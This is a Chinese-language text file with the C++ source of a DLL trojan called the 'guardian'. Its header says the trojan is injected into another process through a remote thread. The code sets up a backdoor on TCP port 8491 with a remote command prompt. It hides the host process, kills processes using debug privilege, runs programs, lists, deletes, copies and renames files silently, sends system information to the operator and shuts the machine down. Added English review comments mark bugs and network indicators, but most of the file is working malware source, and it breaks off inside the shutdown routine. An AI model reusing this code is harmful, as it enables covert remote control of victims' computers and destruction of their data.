📄 dll守护进程.txt
获取远程时间:NetRemoteTOD()
添加一项任务:NetScheduleJobAdd()
WARNING:
/////////////////////////////////////////////////////////////////////////////////////////
关于守护者:
守护者是一个DLL木马，利用远线程在指定的进程中加载。由于这是一个测试版本，所以只有一些基本的功能，如文件操作、关机、杀进程；其他功能我会陆续加入。
此代码在WIN2000SERVER BCB5下通过,局域网测试通过!!
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
先是DLL的源码:
#pragma hdrstop
//---------------------------------------------------------------------------
#pragma argsused
#include <windows.h>
#include <winsock.h>
#include <mmsystem.h>
#include <condefs.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <math.h>
// HideProc() mode: register the calling process
#define SERVICE_PROC 1
// HideProc() mode: unregister it again
#define UNSERVICE_PROC 0
// NOTE(review): <tlhelp32.h> (included above) already defines this constant;
// the redefinition only compiles cleanly because the value is identical
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
// Receive buffer length (consumed by the socket loop, which is not in this excerpt)
#define dwBuffSize 2048
// Maximum command-line length
#define dwComm 50
// TCP port the backdoor listens on -- a concrete network indicator for detection
#define PORT 8491
// NOTE(review): unparenthesised macro body; safe only while it is never used in a larger expression
#define WM_SOCKET WM_USER+1
// Prompt string echoed to the connected client
#define PROMPT "QUEEN:\\>"
// Winsock version requested from WSAStartup (1.1)
DWORD dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
// Listening socket and the accepted client socket; every command handler below writes to NewSock
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
// Declared here but not referenced anywhere in this excerpt
LPTSTR szReadBuff,Ob,TempBuff;
int addrlen;
// Module handle for KERNEL32.DLL obtained in HideProc(); never released with FreeLibrary()
HINSTANCE DLLInst;
// Resolved at run time in HideProc() because not every Windows version exports it
// (NOTE(review): RegisterServiceProcess is a Windows 9x API; on NT it resolves to NULL)
DWORD (WINAPI *RegisterServiceProcess)(DWORD, DWORD);
//---------------------------------------------------------------------------
// GetOS
// Identify the operating-system platform (Win 9x vs. NT)
//---------------------------------------------------------------------------
// Return the platform id reported by GetVersionEx(): VER_PLATFORM_WIN32_WINDOWS
// for Windows 9x or VER_PLATFORM_WIN32_NT for NT/2000.
// BUG(review): for any other platform id the function falls off the end without a
// return statement (undefined return value). The result of GetVersionEx() is not
// checked either, and sVersion is never used.
extern "C" __declspec(dllexport)
DWORD WINAPI GetOS()
{
OSVERSIONINFO os;
TCHAR sVersion[MAX_PATH];
os.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
GetVersionEx(&os);
switch(os.dwPlatformId)
{
case VER_PLATFORM_WIN32_WINDOWS:
return VER_PLATFORM_WIN32_WINDOWS;
case VER_PLATFORM_WIN32_NT:
return VER_PLATFORM_WIN32_NT;
}
}
//---------------------------------------------------------------------------
// HideProc
// Register the process as a service process (via RegisterServiceProcess)
//---------------------------------------------------------------------------
// Look up RegisterServiceProcess in KERNEL32.DLL at run time and call it for the
// current process with `mode` (SERVICE_PROC=1 to register, UNSERVICE_PROC=0 to
// unregister). The function name suggests the intent is to keep the host process
// out of the task list -- a Windows 9x behaviour of that API; confirm against the
// target platform. Returns FALSE if KERNEL32 cannot be loaded or the export is
// missing (the case on NT-based systems, where GetProcAddress() yields NULL).
// NOTE(review): the return value of RegisterServiceProcess itself is ignored, and
// the LoadLibrary reference stored in DLLInst is never released.
extern "C" __declspec(dllexport)
BOOL WINAPI HideProc(int mode)
{
DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}
////////////////////////////////////////////////////////////////////////////
// Enable (bEnablePrivilege != FALSE) or disable a single named privilege on hToken.
// Returns FALSE when the privilege name cannot be resolved or when GetLastError()
// is non-zero after AdjustTokenPrivileges() -- which also covers
// ERROR_NOT_ALL_ASSIGNED, i.e. the token does not hold the privilege at all.
// NOTE(review): the BOOL result of AdjustTokenPrivileges() is discarded, so a
// failed call is only detected through the last-error value. hToken is not
// validated; KillPS() may pass NULL here when OpenProcessToken() failed.
// printf() output from a DLL injected into another process goes to that
// process's console, if it has one, and is otherwise lost.
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)// adjust one privilege on a token
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// previous state is not requested (NULL buffer, NULL length)
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError() );
return FALSE;
}
return TRUE;
}
////////////////////////////////////////////////////////////////////////////
// Terminate the process with id `id`: enable SeDebugPrivilege on the current
// process token, open the target with PROCESS_ALL_ACCESS and TerminateProcess() it.
// Returns IsKilled.
// NOTE(review): every failure only prints a message and falls through, so a NULL
// hProcessToken is still handed to SetPrivilege(), a NULL hProcess still reaches
// TerminateProcess(), and IsKilled is set TRUE regardless of whether the kill
// actually succeeded -- the return value is not a reliable success indicator.
// The message in the SetPrivilege branch says "ok" but is printed on FAILURE.
// TOKEN_ALL_ACCESS is far more than the TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY needed.
// __try/__finally is compiler-specific structured exception handling (BCB/MSVC).
BOOL KillPS(DWORD id)
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
printf("\nOpen Current Process Token failed:%d",GetLastError());
}
// inverted message: this branch runs when SetPrivilege() returned FALSE
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
printf("\nSetPrivilege ok!");
}
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
printf("\nOpen Process %d failed:%d",id,GetLastError());
}
if(!TerminateProcess(hProcess,1))
{
printf("\nTerminateProcess failed:%d",GetLastError());
}
// set unconditionally, even when one of the calls above failed
IsKilled=TRUE;
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}
//---------------------------------------------------------------------------
// EnumProcess
// Enumerate running processes and send the list to the client
//---------------------------------------------------------------------------
// Send the process list (executable name and PID, one per line) to the connected
// client socket NewSock using a Toolhelp32 process snapshot.
// NOTE(review): when CreateToolhelp32Snapshot() fails the error text is sent but
// execution continues with the invalid handle (Process32First and CloseHandle are
// still called on it). wsprintf() formats a szExeFile of up to MAX_PATH characters
// plus the PID into a MAX_PATH buffer, which can overrun szFileName for long
// executable names. %d is used to print a DWORD.
extern "C" __declspec(dllexport)
VOID WINAPI EnumProcess()
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32= {0};
TCHAR szFileName[MAX_PATH];
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,// include the system process list in the snapshot
0);// th32ProcessID argument; the original comment read "0 = current process", but it is ignored for a process snapshot
if (hProcessSnap == (HANDLE)-1)// INVALID_HANDLE_VALUE on failure; note: no return, the code falls through
{
wsprintf(szFileName,"\nCreateToolhelp32Snapshot() failed:%d",GetLastError());
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
pe32.dwSize = sizeof(PROCESSENTRY32);
wsprintf(szFileName,"\nProcessName ProcessID");
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
if (Process32First(hProcessSnap, &pe32))// first process in the snapshot
{
do
{wsprintf(szFileName,"\n%-20s%d",pe32.szExeFile,pe32.th32ProcessID);
send(NewSock,"\n\r",2,0);
send(NewSock,szFileName,lstrlen(szFileName),0);
}
while (Process32Next(hProcessSnap, &pe32));// next process in the snapshot
}
else
{
// printf("\nProcess32Firstt() failed:%d",GetLastError());
}
CloseHandle (hProcessSnap);
}
//---------------------------------------------------------------------------
// LoadProcess
// Execute a file as a new process
//---------------------------------------------------------------------------
// Start szFileName as a new process (passed as the application name, with no
// separate command line) in a normally shown window. Returns FALSE if
// CreateProcess() fails, TRUE otherwise.
// NOTE(review): the process and thread handles returned in pi are never closed,
// so every successful call leaks two handles in the host process.
extern "C" __declspec(dllexport)
BOOL WINAPI LoadProcess(LPCTSTR szFileName)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(STARTUPINFO));
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
si.cb=sizeof(STARTUPINFO);
si.dwFlags=STARTF_USESHOWWINDOW;
si.wShowWindow=SW_SHOWNORMAL;
if(CreateProcess(szFileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi)==FALSE)
{
return FALSE;
}
return TRUE;
}
//---------------------------------------------------------------------------
// Dir
// List files and directories; wildcards are supported
//---------------------------------------------------------------------------
// Send a directory listing for the pattern lParam (wildcards allowed) to NewSock,
// one "name size type" line per entry, or a "Can not find" message.
// NOTE(review): lParam originates from the network command and is copied with
// lstrcpy() into a MAX_PATH stack buffer with no length check -- a client-controlled
// stack overflow inside the host process. The find handle is never released with
// FindClose(). Entries whose attributes match none of DIRECTORY/ARCHIVE/READONLY/
// HIDDEN/SYSTEM (e.g. FILE_ATTRIBUTE_NORMAL) are silently skipped; every
// non-directory is labelled "ARCHIVE"; nFileSizeHigh+nFileSizeLow is not the real
// size (nFileSizeHigh would have to be shifted left by 32); the READONLY branch's
// second format string lacks the space before "ARCHIVE". `i` is unused.
extern "C" __declspec(dllexport)
VOID WINAPI Dir(LPCTSTR lParam)
{
WIN32_FIND_DATA wfd;
HANDLE hHandle;
TCHAR szFileName[MAX_PATH];
int i;
wsprintf(szFileName,"\n\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
// unbounded copy of the network-supplied pattern
lstrcpy(szFileName,lParam);
if((hHandle=FindFirstFile(szFileName,&wfd))!=INVALID_HANDLE_VALUE)
{
do
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
wsprintf(szFileName,"%-20s %10lu <DIR>\n\r",wfd.cFileName,wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_ARCHIVE)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_READONLY)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10luARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_HIDDEN)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_SYSTEM)
{
if(wfd.nFileSizeHigh==0)
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeLow);
else
wsprintf(szFileName,"%-20s %10lu ARCHIVE\n\r",wfd.cFileName,wfd.nFileSizeHigh+wfd.nFileSizeLow);
send(NewSock,szFileName,lstrlen(szFileName),0);
continue;
}
}
while(FindNextFile(hHandle,&wfd));
// hHandle is leaked here: FindClose(hHandle) is missing
}
else
{
wsprintf(szFileName,"Can not find directory or files.\n\r");
send(NewSock,szFileName,lstrlen(szFileName),0);
}
}
//---------------------------------------------------------------------------
// FileOpertion
// Shared file-operation helper (delete / copy / rename via SHFileOperation)
//---------------------------------------------------------------------------
// Run shell file operation `opt` (FO_DELETE / FO_COPY / FO_RENAME) from
// szFileName1 to szFileName2 through SHFileOperation(). Returns TRUE when
// SHFileOperation() reports 0, FALSE otherwise.
// The extra '\0' written after each copied string produces the double-NUL-
// terminated list that pFrom/pTo require.
// NOTE(review): both lstrcpy() calls copy network-supplied paths into MAX_PATH
// stack buffers with no length check, and the second NUL is stored at index
// lstrlen()+1, one past the end when the input fills the buffer. FOF_ALLOWUNDO
// means FO_DELETE sends files to the Recycle Bin rather than removing them
// outright (relevant for recovery/forensics); FOF_FILESONLY restricts wildcard
// matches to files. The quote characters around \0 below are mis-encoded in
// this listing; the intended source is the plain ASCII char literal '\0'.
extern "C" __declspec(dllexport)
BOOL WINAPI FileOpertion(LPCTSTR szFileName1,LPCTSTR szFileName2,DWORD opt)
{
SHFILEOPSTRUCT shf;
TCHAR sr[MAX_PATH];
TCHAR de[MAX_PATH];
lstrcpy(sr,szFileName1);
sr[lstrlen(sr)+1]=‘\0‘;
lstrcpy(de,szFileName2);
de[lstrlen(de)+1]=‘\0‘;
ZeroMemory(&shf,sizeof(shf));
shf.hwnd=NULL;
shf.wFunc=opt;
shf.pFrom=sr;
shf.pTo=de;
// silent, no confirmation prompts, multiple-destination form
shf.fFlags=FOF_ALLOWUNDO|FOF_SILENT|FOF_FILESONLY|FOF_MULTIDESTFILES
|FOF_NOCONFIRMATION|FOF_NOCONFIRMMKDIR;
if(SHFileOperation(&shf))
return FALSE;
else
return TRUE;
}
//---------------------------------------------------------------------------
// Delete
// Delete files (including hidden and read-only ones) and directories; wildcards supported
//---------------------------------------------------------------------------
// Delete the files matching lParam via FileOpertion(FO_DELETE) and report the
// result to NewSock. The destination argument is an empty string (pTo becomes "\0\0").
// NOTE(review): the send() lengths (20 and 18) are one more than the string
// lengths, so the terminating NUL byte is transmitted to the client as well.
extern "C" __declspec(dllexport)
VOID WINAPI Delete(LPCTSTR lParam)
{
if(!FileOpertion(lParam,"",FO_DELETE))
send(NewSock,"Delete File is Fail",20,0);
else
send(NewSock,"Delete File is OK",18,0);
}
//---------------------------------------------------------------------------
// Copy
// Copy, upload or download files (the operator's own disk must first be fully shared); wildcards supported
//---------------------------------------------------------------------------
// Copy the files matching lParam1 to lParam2 via FileOpertion(FO_COPY) and report
// the result to NewSock. Upload/download works by pointing one side at a network
// share (see the header comment above this function).
// NOTE(review): the send() lengths (18 and 16) include the terminating NUL byte.
extern "C" __declspec(dllexport)
VOID WINAPI Copy(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_COPY))
send(NewSock,"Copy File is Fail",18,0);
else
send(NewSock,"Copy File is OK",16,0);
}
//---------------------------------------------------------------------------
// Ren
// Rename a file or directory
//---------------------------------------------------------------------------
// Rename lParam1 to lParam2 via FileOpertion(FO_RENAME) and report the result to
// NewSock.
// NOTE(review): both response strings are misspelled ("Renname", "Reanme"); they
// are runtime output and are left untouched here. The send() lengths (21 and 18)
// include the terminating NUL byte.
extern "C" __declspec(dllexport)
VOID WINAPI Ren(LPCTSTR lParam1,LPCTSTR lParam2)
{
if(!FileOpertion(lParam1,lParam2,FO_RENAME))
send(NewSock,"Renname File is Fail",21,0);
else
send(NewSock,"Reanme File is OK",18,0);
}
//---------------------------------------------------------------------------
// GetSysInfo
// Collect basic system information and send it to the client
//---------------------------------------------------------------------------
// Send a system summary to NewSock: computer name, platform (via GetOS()),
// physical memory in MB, the Windows and system directories, and for each drive
// letter A:..Z: the type (fixed / CD-ROM / network) with its file-system name.
// NOTE(review): szTemp is left uninitialised if GetOS() returns neither platform
// id; GetVolumeInformation() is told szFileSys holds MAX_PATH characters while the
// buffer is only 10, so a long file-system name overruns the stack; %d is used with
// DWORD values; the return values of GetComputerName() and GetVolumeInformation()
// are not checked. The quote characters around 'A' in the drive loop are
// mis-encoded in this listing (intended: the ASCII char literal 'A'). The
// "Option System" / "Memroy" spellings are runtime output and are left as-is.
extern "C" __declspec(dllexport)
VOID WINAPI GetSysInfo()
{
TCHAR szBuff[MAX_PATH];
TCHAR szTemp[MAX_PATH];
wsprintf(szBuff,"\n\n\r<<System Information>>\n\n\r");
send(NewSock,szBuff,lstrlen(szBuff),0);
// computer name
DWORD len=sizeof(szTemp);
GetComputerName(szTemp,&len);
wsprintf(szBuff,"Computer Name: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
// operating system (szTemp stays uninitialised on an unexpected platform id)
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(szTemp,"Windows 9x");
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(szTemp,"Windows NT/2000");
break;
}
wsprintf(szBuff,"Option System: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
// physical memory, rounded up to whole MB
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
wsprintf(szBuff,"Total Memroy: %dM\n\n\r",mem.dwTotalPhys/1024/1024+1);
send(NewSock,szBuff,lstrlen(szBuff),0);
// Windows and system directories
TCHAR szPath[MAX_PATH];
GetWindowsDirectory(szTemp,sizeof(szTemp));
GetSystemDirectory(szBuff,sizeof(szBuff));
wsprintf(szPath,"Windows Directory: %s\n\n\rSystem Directory: %s\n\n\r",szTemp,szBuff);
send(NewSock,szPath,lstrlen(szPath),0);
// drive letters and file-system types
TCHAR szFileSys[10];
for(int i=0;i<26;++i)
{
wsprintf(szTemp,"%c:\\",‘A‘+i);
UINT uType=GetDriveType(szTemp);
switch(uType)
{
case DRIVE_FIXED:
// buffer size argument (MAX_PATH) overstates the real 10-char buffer
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"Hard Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_CDROM:
wsprintf(szBuff,"CD-ROM Disk: %s\n\n\r",szTemp);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
case DRIVE_REMOTE:
// same overstated buffer size as above
GetVolumeInformation(szTemp,NULL,NULL,NULL,NULL,NULL,szFileSys,MAX_PATH);
wsprintf(szBuff,"NetWork Disk: %s (%s)\n\n\r",szTemp,szFileSys);
send(NewSock,szBuff,lstrlen(szBuff),0);
break;
}
}
}
//---------------------------------------------------------------------------
// ExitWin
// Shut down the computer (Win 9x and NT/2000)
//---------------------------------------------------------------------------
extern "C" __declspec(dllexport)
VOID WINAPI ExitWin()
{
DWORD dwVer;
HANDLE hProcess, hToken;
TOKEN_PRIVILEGES NewState;
DWORD ProcessId, ReturnLength = 0;
LUID luidPrivilegeLUID;
dwVer=GetOS();
if(dwVer==VER_PLATFORM_WIN32_WINDOWS)
ExitWindowsEx(1,0);
else if(dwVer==VER_PLATFORM_WIN32_NT)
{
ProcessId = GetCurrentProcessId();
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);